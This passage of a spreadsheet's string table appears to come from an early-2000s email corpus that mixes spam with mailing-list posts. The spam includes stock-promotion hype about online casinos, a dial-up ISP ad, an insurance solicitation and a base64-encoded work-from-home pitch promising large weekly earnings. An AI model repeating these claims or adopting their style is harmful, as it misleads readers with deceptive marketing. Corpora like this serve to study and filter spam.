         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/font&gt;&lt;/big&gt;&lt;/p&gt;
         &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;ul style="margin-top:0in" type="disc"&gt;
           &lt;li class="MsoNormal" style="mso-list:l2 level1 lfo6;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;font
             face="Arial"&gt;&lt;span style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;Total
             online wagers - $13 billion per year&lt;/span&gt;&lt;span
             style="font-size:11.0pt;
      mso-bidi-font-size:12.0pt;font-family:Arial"&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/li&gt;
           &lt;li class="MsoNormal" style="mso-list:l2 level1 lfo6;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;font
             face="Arial"&gt;&lt;span style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;Total
             wagers minus payouts - $651 million &lt;/span&gt;&lt;span
             style="font-size:11.0pt;
      mso-bidi-font-size:12.0pt;font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/li&gt;
           &lt;li class="MsoNormal" style="mso-list:l2 level1 lfo6;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;&lt;font face="Arial"&gt;Number
             of online casinos - around 1700&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
           &lt;/li&gt;
         &lt;/ul&gt;
         &lt;ul style="margin-top:0in" type="disc"&gt;
           &lt;li class="MsoNormal" style="mso-list:l2 level1 lfo6;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;font
             face="Arial"&gt;&lt;span style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;Average
             annual online casino revenue - $3 to $4 million&lt;/span&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial"&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/li&gt;
         &lt;/ul&gt;
         &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p align="left"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Good luck Investors!&lt;/p&gt;
         &lt;font size="2"&gt;&lt;p&gt;&lt;/font&gt;&lt;font color="#008000" size="7"&gt;&lt;strong&gt;Save 40%!&lt;/strong&gt;&lt;/font&gt;&lt;font
         face="Arial" size="3"&gt;&lt;/p&gt;
         &lt;p&gt;&lt;/font&gt;&lt;strong&gt;&lt;font size="3" face="Arial" color="#0000FF"&gt;Save up to 40% on your
         internet access. &lt;/font&gt;&lt;font size="3" face="Arial" color="#008000"&gt;Instead of the
         standard $21.95 to $28.95 Now you can get &lt;/font&gt;&lt;font size="3" face="Arial"
         color="#0000FF"&gt;24/7 unlimited access&lt;/font&gt;&lt;font size="3" face="Arial" color="#008000"&gt;
         with nationwide access numbers on a &lt;/font&gt;&lt;font size="3" face="Arial" color="#0000FF"&gt;fast
         56K, V.90 service&lt;/font&gt;&lt;font size="3" face="Arial" color="#008000"&gt;. Faster connections
         than AT&amp;amp;T and AOL, and faster page loads.&lt;/font&gt;&lt;/strong&gt;&lt;font size="3"&gt;&lt;/p&gt;
         &lt;p&gt;&lt;/font&gt;&lt;font face="Arial" size="4" color="#008000"&gt;&lt;strong&gt; &amp;quot;$16.99 internet
         access. 24/7 unlimited with nationwide access numbers.&amp;quot;&lt;/strong&gt;&lt;/font&gt;&lt;font size="2"&gt;&lt;/p&gt;
         &lt;p&gt;&lt;strong&gt;&lt;font face="Arial" size="4" color="#008000"&gt;Call &lt;/font&gt;&lt;/font&gt;&lt;font
         face="Arial" color="#0000FF" size="4"&gt;1-864-235-2716&lt;/font&gt;&lt;font size="2"&gt;&lt;font
         face="Arial" size="4" color="#008000"&gt; .&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;
         &lt;p align="left"&gt;SAFE HARBOR FOR FORWARD-LOOKING STATEMENTS Except for historical
         information contained herein, the statements on this website and newsletter are
         forward-looking&lt;/font&gt; &lt;font size="2"&gt;statements that are made pursuant to the safe harbor
         provisions of the Private Securities Reform&lt;/font&gt; &lt;font size="2"&gt;Act of 1995.
         Forward-looking statements involve known and unknown risks and uncertainties, which&lt;/font&gt;
         &lt;font size="2"&gt;may cause a company's actual results in the future periods to differ
         materially from forecasted&lt;/font&gt; &lt;font size="2"&gt;results. These risks and uncertainties
         include, among other things, product price volatility,&lt;/font&gt; &lt;font size="2"&gt;product
         demand, market competition and risk inherent in the companies operations. You can&lt;/font&gt; &lt;font
         size="2"&gt;identify these statements by the fact that they do not relate strictly to
         historical or current&lt;/font&gt; &lt;font size="2"&gt;facts. They use words such as
         &amp;quot;anticipate,'' &amp;quot;estimate,'' &amp;quot;expect,'' &amp;quot;project,'' &amp;quot;intend,''&lt;/font&gt;
         &lt;font size="2"&gt;&amp;quot;plan,'' &amp;quot;believe,'' and other words and terms of similar meaning
         in connection with any&lt;/font&gt; &lt;font size="2"&gt;discussion of future operating or financial
         performance. As a suggestion, &amp;quot;Never, ever, make&lt;/font&gt; &lt;font size="2"&gt;an investment
         based solely on what you read in an online newsletter or Internet bulletin&lt;/font&gt; &lt;font
         size="2"&gt;board, especially if the investment involves a small, thinly-traded company that
         isn't well&lt;/font&gt; &lt;font size="2"&gt;known,&amp;quot; said Nancy M. Smith, Director of SEC's
         Office of Investor Education and Assistance.&lt;/font&gt; &lt;font size="2"&gt;&amp;quot;Assume that the
         information about these companies is not trustworthy unless you can prove&lt;/font&gt; &lt;font
         size="2"&gt;otherwise through your own independent research.&amp;quot; &amp;quot;Internet Fraud&amp;quot;
         is available on the&lt;/font&gt; &lt;span
         style="FONT-FAMILY: Times New Roman; mso-fareast-font-family: Times New Roman; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;&lt;font
         size="2"&gt;SEC's Web Site, at &lt;a href="http://www.sec.gov/consumer/cyberfr.htm"&gt;http://www.sec.gov/consumer/cyberfr.htm&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p align="left"&gt;
         &lt;span style="FONT-SIZE: 7.5pt; COLOR: #999999; FONT-FAMILY: Arial"&gt;We 
         strongly oppose the use of SPAM email and do not want to send our 
         mailings to anyone who does not &amp;nbsp;wish to receive them. &lt;br&gt;
         If you do not wish to receive further mailings, please &lt;/span&gt;
         &lt;font size="1"&gt;&lt;a href="mailto:uunsubvtge@firemail.de"&gt;Click Here&lt;/a&gt;&lt;/font&gt;&lt;span style="FONT-SIZE: 7.5pt; COLOR: #999999; FONT-FAMILY: Arial"&gt; 
         and rest assured you will receive another message form us.&lt;br&gt;
         &lt;br&gt;
         If you would like to subscribe to future mailing of this type please
         &lt;a href="mailto:ssubvtge@firemail.de"&gt;click here to subscribe&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p class="MsoNormal" align="center" style="margin-top: 0; margin-bottom: 0"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p class="MsoNormal" style="margin-top: 0; margin-bottom: 0" align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;hr&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [BJK9^":}H&amp;*TG0BK]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</si>
  <si>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whoa
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == James Rogers &lt;jamesr@best.com&gt; writes:
     J&gt; An example: Being able to model RF propagation in three
     J&gt; dimensions for a metro area when deploying wireless networks.
     J&gt; By having every single tree and building detail and similar,
     J&gt; you can "see" even tiny dead spots due to physical blockage and
     J&gt; signal attenuation.  
 Hmmm, just as I thought.  In other words, it has no practical uses
 whatsoever ;) ... do the biz guys in your office /really/ think WISPs
 are really going to shell out /their/ money to find a house or two
 they can't reach?  Experience suggests (a) they won't care and (b)
 they will even sign up that errant house and then give them a
 run-around blaming the dead-spot on "unsupported vendor equipment".
 Thus, yes, it is 'cool': Expensive toy with no apparent function ;)
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Nobel prize for British and US scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655712,215/
 Date: 2002-10-08T03:30:54+01:00
 *Medicine and health: *The discovery of the myriad little deaths which lead to 
 life brought the most coveted prize in world medicine to two Britons and an 
 American yesterday.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Insert signature
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi!
 Is there a command to insert the signature using a combination of keys and not 
 to have sent the mail to insert it then?
 Regards,
 Ulises
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Daft crimes etc
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.irishnews.com/access/daily/current.asp?SID=421083
 Loo rolls of honour and the invisible man
 Paper Clips: A round-up of the weekly press
 By Steven McCaffery
 The powers-that-be tell us that crime does not pay. And they found an 
 ally in the Ulster Herald this week, which carries a cautionary tale 
 for anyone thinking of embarking on a criminal career. The 
 Omagh-based paper's 'As the Man Says' column brings a story which 
 originated in the Middle East.
 "A gent recently attempted to rob a bank in Tehran," the columnist reports.
 "He was unarmed and began seizing bank notes from customers' hands."
 It is then explained: "He had paid 625 to a local sorcerer and 
 believed that he was invisible."
 In the Lurgan Mail there was also news of a dramatic robbery.
 "A Lurgan newsagent has told how thieves drilled their way through 
 three walls to steal 10,000 worth of cigarettes recently in an 
 attack which was well planned and professional," the paper reports.
 "The thieves broke through the back wall of a religious gifts shop 
 next door to the newsagents and then drilled through the partition 
 between the back hallway and the front shop.
 "Moving statues of religious icons out of the way, the gang then 
 drilled into the back of the newsagent's cigarette stand removing the 
 contents."
 The owner of the Paper Chase shop is pictured next to the gaping hole 
 left in his store and is quoted as saying: "On Monday morning when my 
 wife was opening, everything looked normal.
 "But when she opened the shutters she found herself looking into the 
 shop next door."
 The paper reports that the shop was the target of "another well 
 organised crime" 12 weeks ago when thieves escaped with a safe.
 The shop's owner says: "The closer it gets to Christmas the more 
 people are going to be open to this."
 The issues of crime and punishment are tackled by a columnist in the 
 Down Democrat.
 Writing in the Downpatrick-based newspaper John Coulter calls on the 
 authorities to "birch the vandals" plaguing the local community.
 He is shocked at reports of the "wanton destruction by vandals" and 
 issues a call for action.
 "The time has come to fight fire with fire," he writes, "before 
 unemployed paramilitaries decide to impose vigilante rule and start 
 using so-called kangaroo courts to dish out their own brand of 
 sentences on those found 'guilty' of anti-social behaviour."
 As an alternative to such reckless violence, he recommends, 
 controlled violence.
 "It was a sorry day that the Manx authorities banned the use of the 
 birch as a weapon in dealing with unruly elements of the Isle of Man."
 Getting his defence in early, he immediately rounds on any woolly 
 liberal who may oppose his plan.
 "In many Islamic countries, public flogging of convicted criminals is 
 the order of the day.
 "You might laugh and say there is little chance of such measures 
 being introduced in the United Kingdom or Ireland given that corporal 
 punishment was abolished in the vast majority of northern schools in 
 the late 1980s.
 "However, people seem to forget that Islam is the fastest growing 
 faith on the British mainland and it's only a matter of time before 
 it numerically passes Christianity."
 -- 
 Joe McNally :: Flaneur at Large :: http://www.flaneur.org.uk
 --
 "I am the centre which exists only because the geometry of the abyss 
 demands it." - Fernando Pessoa
 --
 Currently playing: nothing.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-763629846P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Thu, 22 Aug 2002 09:12:16 -0500
 &gt;
 &gt; &gt; From:  "J. W. Ballantine" &lt;jwb@homer.att.com&gt;
 &gt; &gt; Date:  Wed, 21 Aug 2002 09:51:31 -0400
 &gt; &gt;
 &gt; &gt; I CVS'ed the unseen/Sequences changes and installed them, and have only one 
 &gt; &gt; real issue.
 &gt; &gt; 
 &gt; &gt; I use the unseen window rather than the exmh icon, and with the new code
 &gt; &gt; I can't seem to be able to.  How many unseen when when I have the main window open
 &gt; &gt; is not really necessary.
 &gt; 
 &gt; hmmm, I stole the code from unseenwin, but I never tested it since I don't use 
 &gt; that functionality.  Consider it on my list of things to check.
 Well, unfortunately, I appear to be using a window manager that doesn't 
 support the icon window.
 However, I did fix some bugs in the related "Hide When Empty" functionality 
 which may solve the issue.  You may need to remove "unseen" from the "always 
 show sequences" to make this work.  If so, let me know so I can put that in 
 the help window for "Icon Window" as it already is for "Hide When Empty".
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-763629846P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZRE3K9b4h5R0IUIRAjS+AJ4m8f6zA6kMkzYOCI7d+HelmpapYQCfbbDi
 LCumaahI4ILE6tbF8nUd0r8=
 =nwh1
 -----END PGP SIGNATURE-----
 --==_Exmh_-763629846P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] What HOWTOs for SOHO system
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,
 I'm trying to set up the following:
 1. A Linux server running with a modem for internet connectivity and an
 ethernet card for LAN connectivity
 2. Other LAN pcs with ethernet cards, using the Linux server for
 DNS/DHCP etc.
 Basically, I want to route any non LAN traffic through the ppp0.
 I've got some of the way, but like a similar post earlier about modem
 problems, when I am connected to the internet with eht0 up, the routing
 is all incorrect and noting goes out through ppp0 (eh0 must be the
 default route or something).
 Is there standard "out of the box" Linux tools that will carry out
 portmapping on behalf of the LAN PCs ?  (I'm planning on non routable
 addresses 192.168.x.x for the LAN, routed outwards via the ppp0
 interface).
 Can someone point me at the right HOWTOs or routing documentation I need
 to follow ? 
 Thanks,
 Dermot.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Low Cost High Rated Insurance. Why Pay More?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;body&gt;
 &lt;table bgColor=3D"#ffffff" border=3D"0" borderColor=3D"#111111" cellPaddin=
 g=3D"4" cellSpacing=3D"0" style=3D"BORDER-COLLAPSE: collapse" width=3D"95%=
 "&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td align=3D"right" bgColor=3D"#99cc00" height=3D"424" vAlign=3D"top=
 "&gt;
         &lt;table border=3D"0" cellPadding=3D"0" cellSpacing=3D"0" width=3D"1=
 00%"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
               &lt;td&gt;
                 &lt;div align=3D"left"&gt;
                   &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvet=
 ica, sans-serif" size=3D"2"&gt;&lt;b&gt;&lt;font color=3D"#000000" face=3D"Verdana, Ar=
 ial, Helvetica, sans-serif" size=3D"2"&gt;&lt;br&gt;
                   &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helve=
 tica, sans-serif" size=3D"5" color=3D"#FFFFFF"&gt;SAVE
                   up to 70% On Your Life Insurance!&lt;/font&gt;&lt;/b&gt;
                 &lt;/div&gt;
                 &lt;div align=3D"left"&gt;
                   &lt;p align=3D"center"&gt;&lt;font size=3D"4"&gt;&lt;b&gt;&lt;font color=3D"#=
 000000"&gt;&lt;font face=3D"Arial"&gt;Get&lt;/font&gt;&lt;font face=3D"arial"&gt;
                   &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Arial" color=3D"#FFFFFF"&gt;FRE=
 E&lt;/font&gt;&lt;font color=3D"#000000"&gt;&lt;font face=3D"arial"&gt;
                   &lt;/font&gt;&lt;font face=3D"Arial"&gt;Life Insurance quotes from&lt;/=
 font&gt;&lt;/font&gt;&lt;font face=3D"Arial" color=3D"#000000"&gt;
                   &lt;/font&gt;&lt;font color=3D"#000000" face=3D"arial"&gt;the very b=
 est
                   companies at&lt;/font&gt;&lt;font color=3D"#000000" face=3D"arial=
 "&gt; &lt;/font&gt;&lt;font face=3D"Arial" color=3D"#000000"&gt;The
                   Lowest Rates.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color=3D"#000000"&gt;&lt;=
 br&gt;
                   &lt;/font&gt;
                 &lt;/div&gt;
                 &lt;div align=3D"left"&gt;
                   &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" ptsize=3D"=
 10" size=3D"4"&gt;You
                   can't predict the future, but you can always prepare for=
  it.&lt;/font&gt;&lt;/b&gt;
                 &lt;/div&gt;
                 &lt;div align=3D"left"&gt;
                   &lt;div align=3D"left"&gt;
                     &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana" ptsize=3D"1=
 0" size=3D"4"&gt;Compare
                     rates from top insurance companies around the country&lt;=
 br&gt;
                     In our life and times, it's important to plan for your
                     family's future, while being comfortable financially. =
 Choose
                     the right Life Insurance policy today.&lt;/font&gt;
                   &lt;/div&gt;
                   &lt;div align=3D"left"&gt;
                     &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" face=3D=
 "Verdana" style=3D"FONT-SIZE: 16pt"&gt;Insurance
                     Companies Compete For Your Insurance.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
                     &lt;p align=3D"left"&gt;
                   &lt;/div&gt;
                   &lt;div align=3D"left"&gt;
                     &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000000" face=3D=
 "arial" size=3D"4"&gt;It's
                     fast, easy, and best of all... FREE. &lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                   &lt;/div&gt;
                 &lt;/div&gt;
                 &lt;font size=3D"+0" color=3D"#ff0000" face=3D"Verdana, Arial=
 , Helvetica, sans-serif" style=3D"font-size: 16.5pt"&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td&gt;
                 &lt;div align=3D"left"&gt;
                   &lt;p align=3D"left"&gt;&amp;nbsp;&lt;/p&gt;
                   &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;
                   &lt;table border=3D"0" cellPadding=3D"0" cellSpacing=3D"2" =
 height=3D"38" width=3D"482"&gt;
                     &lt;tbody&gt;
                       &lt;tr&gt;
                         &lt;td height=3D"36" style=3D"BORDER-BOTTOM: 0px soli=
 d; BORDER-LEFT: 0px solid; BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid"=
  width=3D"327"&gt;&lt;/td&gt;
                         &lt;td bgColor=3D"#ff0000" height=3D"36" style=3D"BOR=
 DER-LEFT: 1px solid" width=3D"141"&gt;
                           &lt;p align=3D"center"&gt;&lt;b&gt;&lt;a href=3D"http://www.chi=
 naniconline.com/savequote/" style=3D"TEXT-DECORATION: none"&gt;&lt;font color=3D=
 "#ffffff" size=3D"4"&gt;CLICK
                           HERE&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;a href=3D"http://www.=
 chinaniconline.com/savequote/" style=3D"TEXT-DECORATION: none"&gt;&lt;b&gt;&lt;font co=
 lor=3D"#ffffff" size=3D"4" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;
                           FOR YOUR FREE QUOTE!&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/tbody&gt;
                   &lt;/table&gt;
                   &lt;/b&gt;
                 &lt;/div&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;p align=3D"left"&gt;If you are in receipt of this email in error and/or wish=
  to be
 removed from our list, &lt;a href=3D"mailto:jc6@btamail.net.cn"&gt;PLEASE CLICK =
 HERE&lt;/a&gt;
 AND TYPE REMOVE. If you reside in any state which prohibits e-mail solicit=
 ations
 for insurance, please disregard this email.&lt;br&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Have You Dreamed Of Your Own Home Based Business?       eIExvv
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00X9_70A11C1D.E1232J43
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+PGJvZHk+DQo8Zm9udCBzaXplPSIyIj4NCjx0YWJsZSBzdHlsZT0iQk9SREVSLUNPTExB
 UFNFOiBjb2xsYXBzZSIgYm9yZGVyQ29sb3I9IiMxMTExMTEiIGNlbGxTcGFjaW5nPSIwIiBjZWxs
 UGFkZGluZz0iMiIgd2lkdGg9IjU0OSIgDQpiZ0NvbG9yPSIjZmZmZmZmIiBib3JkZXI9IjAiPg0K
 ICA8dGJvZHk+DQogICAgPHRyPg0KICAgICAgPHRkIHdpZHRoPSI1MzMiPjxmb250IHNpemU9IjIi
 IGZhY2U9IkFyaWFsIj48Yj5Gcm9tOjwvYj4mbmJzcDsgRGFsbGluDQogICAgICAgIEBBR00gSG9s
 ZGluZ3M8YnI+DQogICAgICAgIDxicj4NCiAgICAgICAgPGI+DQogICAgICAgIFN1YmplY3Q6PC9i
 PiBIYXZlIFlvdSBEcmVhbWVkIE9mIFlvdXIgT3duIEhvbWUgQmFzZWQgQnVzaW5lc3M/ICAgIA0K
 ICAgICAgICAgPGJyPg0KICAgICAgICA8YnI+DQogICAgICAgIDxiPg0KICAgICAgICBNb3RpdmF0
 ZWQgSW5kaXZpZHVhbHM8L2I+PGJyPg0KICAgICAgICA8YnI+DQogICAgICAgIDxmb250IGNvbG9y
 PSIjZmYwMDAwIj48Yj48YnI+DQogICAgICAgIDxicj4NCiAgICAgICAgLS0tLS0tLSZndDsgPGk+
 QUJPVVQgT1VSIENPTVBBTlk8YnI+DQogICAgICAgIDwvaT48L2I+PC9mb250PkFHTSBIb2xkaW5n
 cyBkaXN0cmlidXRlcyA8aT5vbmx5IDwvaT48dT5sZWdhbCBjcmVkaXQ8YnI+DQogICAgICAgIHJl
 cGFpciBpbmZvcm1hdGlvbiBhbmQgZmluYW5jaWFsIGJ1c2luZXNzIHByb2dyYW1zPGJyPg0KICAg
 ICAgICA8L3U+dG8gdGhvdXNhbmRzIG9mIGluZGl2aWR1YWxzIGFsbCBvdmVyIHRoZSBVbml0ZWQ8
 YnI+DQogICAgICAgIFN0YXRlcy48YnI+DQogICAgICAgIDxicj4NCiAgICAgICAgV2UgYXJlIGN1
 cnJlbnRseSBzZWVraW5nIHNlbGYgbW90aXZhdGVkLCBkcml2ZW48YnI+DQogICAgICAgIHBlb3Bs
 ZSB3aG8gd2lzaCB0byA8Yj48Zm9udCBjb2xvcj0iIzAwMDBGRiI+ZWFybiBzdWJzdGFudGlhbCBh
 ZGRpdGlvbmFsPGJyPg0KICAgICAgICBpbmNvbWUgYW5kIGNhcGl0YWxpemUgb24gdGhlIGV4cGxv
 c2l2ZSBncm93dGggb2Y8YnI+DQogICAgICAgIHRoZSBpbnRlcm5ldC48L2ZvbnQ+PC9iPiA8Zm9u
 dCBjb2xvcj0iI2ZmMDAwMCI+PGJyPg0KICAgICAgICA8YnI+DQogICAgICAgIDwvZm9udD48dT48
 Yj48aT5JZiB5b3UgaGF2ZSBiZWVuIHNlZWtpbmcgdGhpcyBvcHBvcnR1bml0eSwgcGxlYXNlPGJy
 Pg0KICAgICAgICBrZWVwIHJlYWRpbmcgYW5kIGltbWVkaWF0ZWx5IGNvbXBsZXRlIGFuZDxicj4N
 CiAgICAgICAgcG9zdGFsIG1haWwgb3IgZmF4IHRoZSBmb3JtIGJlbG93IHRvIGVucm9sbC48YnI+
 DQogICAgICAgIDxicj4NCiAgICAgICAgPC9pPjwvYj48L3U+SWYgeW91IGFyZSBub3Qgc29tZW9u
 ZSBzZWVraW5nIHRvIGVhcm4gaW5jb21lIGF0PGJyPg0KICAgICAgICB5b3VyIG93biBwYWNlIGFu
 ZCBncm93IGEgc3RhYmxlLCBob21lIGJhc2VkPGJyPg0KICAgICAgICBidXNpbmVzcywgcGxlYXNl
 IGRpc2NhcmQgdGhpcyBlLW1haWwgYXMgd2UgZG8gbm90PGJyPg0KICAgICAgICB3YW50IHRvIHdh
 c3RlIGFueSBvZiB5b3VyIHRpbWUgYW5kIGFwb2xvZ2l6ZSBmb3I8YnI+DQogICAgICAgIHRoZSBl
 cnJvci48YnI+DQogICAgICAgIDxicj4NCiAgICAgICAgVGhpcyBlbWFpbCB3YXMgaW50ZW5kZWQg
 Zm9yIHRoZSByZWNpcGllbnQgd2hvIGlzPGJyPg0KICAgICAgICBzZWVraW5nIGFuIGVhc3kgbW9u
 ZXkgbWFraW5nIG9wcG9ydHVuaXR5IGZyb208YnI+DQogICAgICAgIGhvbWUsIHNldHRpbmcgdGhl
 aXIgb3duIHBhY2UgYW5kIHdvcmstbG9hZC48YnI+DQogICAgICAgIDxicj4NCiAgICAgICAgPGI+
 PGZvbnQgY29sb3I9IiNmZjAwMDAiPi0tLS0tLS0mZ3Q7IFN0YXJ0IFNtYWxsIG9yIEVYUExPREUg
 SW50byBXZWFsdGg8YnI+DQogICAgICAgIDwvZm9udD48L2I+T3VyIGhvbWUgYmFzZWQgb3Bwb3J0
 dW5pdHkgaXMgYSB3b3JrLWF0LWhvbWU8YnI+DQogICAgICAgIHByb2dyYW0gZm9yIGRlZGljYXRl
 ZCwgbW90aXZhdGVkIGluZGl2aWR1YWxzPGJyPg0KICAgICAgICBpbnRlcmVzdGVkIGluIHRoZSBv
 cHBvcnR1bml0eSBvZiBlYXJuaW5nIGFuIGV4dHJhPGJyPg0KICAgICAgICAkNTAwLjAwIHRvICQy
 LDUwMC4wMCBwZXIgd2VlaywgRVZFUlkgd2Vlaywgd29ya2luZzxicj4NCiAgICAgICAgZGlyZWN0
 bHkgZnJvbSB0aGUgY29tZm9ydCBvZiB0aGVpciBvd24gaG9tZSwgZG9ybSw8YnI+DQogICAgICAg
 IG9yIGFwYXJ0bWVudC48YnI+DQogICAgICAgIDxicj4NCiAgICAgICAgT3VyIHdvcmstYXQtaG9t
 ZSBwcm9ncmFtIGlzIGFuIEhPTkVTVCBvcHBvcnR1bml0eTxicj4NCiAgICAgICAgZm9yIHlvdSB0
 byBlYXJuIGEgc2VyaW91cyBleHRyYSBpbmNvbWUgd2l0aG91dDxicj4NCiAgICAgICAgaGF2aW5n
 IHRvIHNhY3JpZmljZSBhIGxvdCBvZiB5b3VyIGZyZWUgdGltZS48YnI+DQogICAgICAgIDxicj4N
 CiAgICAgICAgPGI+PGZvbnQgY29sb3I9IiNmZjAwMDAiPi0tLS0tLS0mZ3Q7IEluY3JlZGlibGUg
 SG9tZSBCYXNlZDxicj4NCiAgICAgICAgT3Bwb3J0dW5pdHkgUHJvZ3JhbSA8aT5SRVFVSVJFTUVO
 VFM8YnI+DQogICAgICAgIDwvaT48L2ZvbnQ+PC9iPllPVSBhbmQgWU9VIEFMT05FIG11c3QgaGF2
 ZSB0aGUgZGVzaXJlIHRvIHdhbnQ8YnI+DQogICAgICAgIGFkZGl0aW9uYWwgaW5jb21lIGZyb20g
 WU9VUiBvd24gaG9tZSBiYXNlZDxicj4NCiAgICAgICAgYnVzaW5lc3MuJm5ic3A7IFdFIENBTk5P
 VCBQUk9WSURFIHRoZSBkcml2ZSBvciBkZXNpcmUuPGJyPg0KICAgICAgICBZT1UgbXVzdCBhbHJl
 YWR5IHBvc3Nlc3MgdGhlIGRlc2lyZSBpbiBvcmRlciB0bzxicj4NCiAgICAgICAgZWFzaWx5IGVh
 cm4gdGhvdXNhbmQncyBvZiBkb2xsYXJzIGEgd2VlaywgcnVubmluZyB5b3VyPGJyPg0KICAgICAg
 ICBvd24gaG9tZSBiYXNlZCBidXNpbmVzcy48YnI+DQogICAgICAgIDxicj4NCiAgICAgICAgSXNu
 J3QgaXQgYWJvdXQgdGltZSB5b3UgZ290IHlvdXIgcGllY2Ugb2YgdGhlPGJyPg0KICAgICAgICB1
 bmxpbWl0ZWQgb3Bwb3J0dW5pdHkgdGhlIGludGVybmV0IGhhcyB0byBvZmZlcj88YnI+DQogICAg
